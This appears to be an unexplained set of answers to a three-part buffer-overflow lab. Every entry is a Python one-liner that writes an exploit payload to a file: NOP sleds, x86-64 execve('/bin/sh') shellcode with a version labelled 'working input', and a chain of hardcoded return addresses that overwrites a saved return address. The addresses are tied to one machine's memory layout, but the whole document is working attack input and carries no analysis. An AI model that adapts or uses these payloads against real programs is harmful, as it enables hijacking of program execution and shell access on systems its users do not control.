Part 1 input:
python -c 'print "\x90"*114 + "\x48\xb8\x70\x80\xa4\xf7\xff\x7f\x00\x00\x48\xbf\x73\x96\xb9\xf7\xff\x7f\x00\x00\xff\xd0" + "\xd0\xe0\xff\xff\xff\x7f\x00\x00"' > input1

Part 2 input:
python -c "print '\x90'*104 + '\xb8\x3b\x00\x00\x00\x48\x31\xc9\x48\x31\xd2\x48\x31\xf6\x48\xbf\x2f\x62\x69\x6e\x2f\x73\x68\x00\x56\x57\x54\x5f\x0f\x05\x66\x90' + '\xd0\xe0\xff\xff\xff\x7f\x00\x00"'" > input

working input:

python -c 'print "\x90"*110 + "\xb8\x3b\x00\x00\x00\x48\x31\xc9\x48\x31\xd2\x48\x31\xf6\x48\xbf\x73\x96\xb9\xf7\xff\x7f\x00\x00\x0f\x05" + "\xd0\xe0\xff\xff\xff\x7f\x00\x00"' > input2


Part 3 input:
python -c 'print "3"*136 + "\x10\x33\xa7\xf7\xff\x7f\x00\x00" + "\xd5\xa5\xba\xf7\xff\x7f\x00\x00" + "\x73\x96\xb9\xf7\xff\x7f\x00\x00" + "\xe0\x7a\xa4\xf7\xff\x7f\x00\x00" + "\x20\xC0\xA3\xF7\xFF\x7F\x00\x00"' > input3

python -c 'print "3"*136 + "\x10\x33\xa7\xf7\xff\x7f\x00\x00" + "\xd5\xa5\xba\xf7\xff\x7f\x00\x00" + "\x73\x96\xb9\xf7\xff\x7f\x00\x00" + "\xe0\x7a\xa4\xf7\xff\x7f\x00\x00" + "\x00\xc0\xa3\xf7\xff\x7f\x00\x00"' > input3
